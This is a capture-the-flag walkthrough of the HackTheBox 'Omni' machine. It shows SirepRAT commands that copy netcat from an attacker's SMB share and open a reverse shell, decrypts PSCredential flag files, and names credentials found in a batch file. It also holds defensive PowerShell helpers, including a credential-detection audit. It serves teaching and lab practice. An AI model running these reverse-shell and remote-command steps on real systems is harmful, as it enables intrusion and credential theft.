HackTheBox - Omni Walkthrough

System Summary 


Initial Scan

The nmap scan shows some open ports:






It looks like a Windows machine, but with some additional services.

Rather than brute-forcing the WinRM service on port tcp/5985, we can open the URL http://10.10.10.204:8080, where we see a basic authentication form for “Windows Device Portal”.





“Windows Device Portal” is a web service for managing IoT devices running Windows IoT Core.
This portal ships with a default set of credentials, Administrator : p@ssw0rd, but they don’t work here.

Initial Foothold

Looking for a public exploit, we can find a Python script named SirepRAT.py in this GitHub repo: https://github.com/SafeBreach-Labs/SirepRAT.git

It requires Python 2 and a few packages.

After cloning the repo and verifying the code, we can run it to execute remote commands.

Below is an example of displaying the hosts file:

We can also run other commands, like ping:
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\ping.exe" --args "10.10.16.78"


Next step is to get a shell by downloading netcat to the box and running it.

We can try to download netcat via HTTP, but it doesn’t work as expected with the usual techniques:

  • PowerShell download
  • Bitsadmin.exe
  • Certutil.exe

As an alternative we can use the SMB protocol, by hosting a public share on our local machine:

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd 'c:\windows\system32\xcopy' --args '\\10.10.16.78\nik\nc.exe c:\'


Now that we have successfully downloaded nc.exe, we can use it for a reverse shell on port 4444:

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd 'c:\nc.exe' --args '-e cmd.exe 10.10.16.78 4444'

But it doesn’t work.

The problem is that the nc.exe shipped with Kali is compiled for x86, while the box is x64 and doesn’t execute 32-bit PE files.

So let's grab an nc64.exe build from https://github.com/int0x33/nc.exe and repeat the upload-and-execute procedure:
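Before pushing a binary to a target it is worth confirming which architecture it was actually built for. The function below is an added example, not part of the original walkthrough or of either netcat repository: it reads the DOS header, follows e_lfanew to the PE signature and decodes the Machine field of the COFF file header. The two file paths at the bottom are assumptions.

```powershell
# Added example (not from the original walkthrough): read the COFF header of a PE file
# to confirm which CPU it was built for. The file paths used in the calls are assumptions.
function Get-PeMachine {
    param([Parameter(Mandatory)][string]$Path)

    $bytes = [System.IO.File]::ReadAllBytes($Path)
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) {
        throw "$Path is not a PE file (missing MZ header)"
    }

    # e_lfanew (offset of the PE signature) lives at 0x3C in the DOS header.
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
    if ($peOffset -lt 0 -or $peOffset + 6 -gt $bytes.Length -or
        [BitConverter]::ToUInt32($bytes, $peOffset) -ne 0x00004550) {   # "PE\0\0" little-endian
        throw "$Path has no PE signature"
    }

    # The Machine field is the first WORD of the COFF file header, right after the signature.
    $machine = [BitConverter]::ToUInt16($bytes, $peOffset + 4)
    $names = @{ 0x014C = 'x86'; 0x8664 = 'x64'; 0x01C0 = 'ARM'; 0x01C4 = 'ARMNT'; 0xAA64 = 'ARM64' }
    $key = [int]$machine
    $arch = if ($names.ContainsKey($key)) { $names[$key] } else { 'unknown' }

    [pscustomobject]@{
        Path    = $Path
        Machine = ('0x{0:X4}' -f $machine)
        Arch    = $arch
    }
}

# Assumed locations of the two netcat builds discussed above.
Get-PeMachine -Path 'C:\tools\nc.exe'
Get-PeMachine -Path 'C:\tools\nc64.exe'
```

The 32-bit Kali build reports Machine 0x014C (x86) and the int0x33 build 0x8664 (x64), which is the mismatch that made the first reverse shell attempt fail silently.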


We’re now on the system as user omni$ (low privilege) and can do some enumeration.

We can search for user.txt and root.txt.

We can read both files (really!) but they're not in the usual format.

Let's look at user.txt



That's an XML file with a PSCredential object inside.

The password inside it is stored encrypted; we can try to decrypt it with PowerShell:

$credential = Import-CliXml -Path 'C:\data\users\app\user.txt'

This imports the file; the following command then shows the clear-text password:
$credential.GetNetworkCredential().Password

Unfortunately it doesn't work, because the file can only be decrypted by the user who exported it, app... and we're user omni$.
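To see why the file is readable but not decryptable from another account, here is an added example (not from the walkthrough) that round-trips a constructed PSCredential through Export-CliXml and Import-CliXml. The temp path, username and password are constructed for the demonstration; the point it shows is that the password on disk is a DPAPI blob bound to the exporting user, so a second account gets the file contents but not the key.

```powershell
# Added example (not from the original walkthrough): what Export-CliXml does with a
# PSCredential, and why only the exporting user can read the password back.
# The path and the sample username/password are constructed for this demonstration.

$path = Join-Path $env:TEMP 'demo-cred.xml'

# Build a credential from a constructed password and serialize it the same way
# user.txt on the box was produced.
$secure = ConvertTo-SecureString 'Sample-P@ss-123' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ('demo-user', $secure)
$cred | Export-CliXml -Path $path

# On disk the password is not the SecureString itself but a DPAPI-protected hex blob
# keyed to the exporting user's profile; the username is stored in the clear.
$xml = Get-Content -Path $path -Raw
if ($xml -match '<SS N="Password">([0-9a-fA-F]+)</SS>') {
    "DPAPI blob: $($Matches[1].Length) hex chars, starts with $($Matches[1].Substring(0, 16))"
}
if ($xml -match '<S N="UserName">([^<]+)</S>') {
    "Username stored in clear text: $($Matches[1])"
}

# Same user, same machine: Import-CliXml rebuilds the PSCredential and the password
# comes back in clear text.
$imported = Import-CliXml -Path $path
"User: $($imported.UserName)"
"Pass: $($imported.GetNetworkCredential().Password)"

# Running the same Import-CliXml from a different account (omni$ reading app's file)
# fails inside DPAPI, typically with "Key not valid for use in specified state",
# because that account does not hold the profile key the blob was protected with.

Remove-Item -Path $path
```

This is also the reason the file could safely sit in a world-readable folder from the author's point of view: the real protection is the DPAPI user key, which is exactly what becoming user app later provides.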

In the c:\data\users\app folder there are a few other files.

hardening.txt is not readable, but another XML file is...

User Flag

We have to find a way to become user app.

Running the standard enumeration commands, like get-childitem -hidden -recurse -Path c:\XYZ,
we can find an r.bat file in c:\program files\WindowsPowershell\Modules\PackageManagement

It should not be there, and it contains a couple of credentials:

  • Username app with password mesh5143
  • Username administrator with password _1nt3rn37ofTh1nGz
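From the defender's side, a stray batch file carrying account passwords inside a PowerShell module directory is an easy thing to audit for. The script below is an added example, not part of the walkthrough: it walks the two standard module roots, flags file types that have no business there (.bat, .cmd, .vbs and so on) and reports which scripts contain credential-looking lines, without echoing the secret itself. The module roots and the regex patterns are assumptions for the demonstration.

```powershell
# Added example (not from the original walkthrough): audit the PowerShell module directories
# for files that do not belong there and for inline credentials, which is how a file like
# r.bat would be caught. The roots and patterns below are assumptions for this demonstration.

$moduleRoots = @(
    (Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules'),
    (Join-Path $env:SystemRoot   'System32\WindowsPowerShell\v1.0\Modules')
)

# File types that should never appear inside a module folder.
$unexpectedExt = '.bat', '.cmd', '.vbs', '.js', '.hta', '.exe'

# Script types worth grepping for stored credentials.
$scriptExt = '.bat', '.cmd', '.ps1', '.psm1', '.vbs'

# Lines that look like a stored credential or an account-creation command.
# Select-String is case-insensitive by default.
$credPatterns = @(
    'net\s+user\s+\S+\s+\S+',               # net user <name> <password>
    'ConvertTo-SecureString.*-AsPlainText',  # plaintext-to-SecureString inline
    'pass(word)?\s*[=:]\s*\S+'               # password=..., pass: ...
)

$findings = foreach ($root in $moduleRoots) {
    if (-not (Test-Path -Path $root)) { continue }

    Get-ChildItem -Path $root -Recurse -Force -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $ext  = $file.Extension.ToLower()

            if ($unexpectedExt -contains $ext) {
                [pscustomobject]@{
                    Path   = $file.FullName
                    Reason = "unexpected file type $ext in module directory"
                    Detail = $null
                }
            }

            if ($scriptExt -contains $ext) {
                # Report only the line number and the pattern that hit, never the line
                # itself, so the audit output does not re-leak the credential.
                Select-String -Path $file.FullName -Pattern $credPatterns -ErrorAction SilentlyContinue |
                    ForEach-Object {
                        [pscustomobject]@{
                            Path   = $file.FullName
                            Reason = 'credential-like line'
                            Detail = "line $($_.LineNumber) matched /$($_.Pattern)/"
                        }
                    }
            }
        }
}

$findings | Format-Table -AutoSize
```

Run as a scheduled check, a non-empty result for the first reason alone is a strong signal: legitimate modules consist of .psm1, .psd1, .ps1xml, help files and assemblies, so a .bat under Modules\PackageManagement has no benign explanation.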

These users don't work for WinRM but give us access to the Windows Device Portal site:

We can log in and use the "Processes" section to run a command.

In this case we can run the same nc64.exe we executed through the exploit:

We receive a shell as user app.

With it we can access hardening.txt and display its content:


And we can also decrypt the user.txt PSCredential file:

And this is the user flag.


Root Flag

We can do the same thing as with user app:

  1. Log into Device Portal as user administrator
  2. Run nc64.exe from the web form
  3. Receive the shell
  4. Open the file root.txt and get the clear-text flag using the PowerShell commands seen above


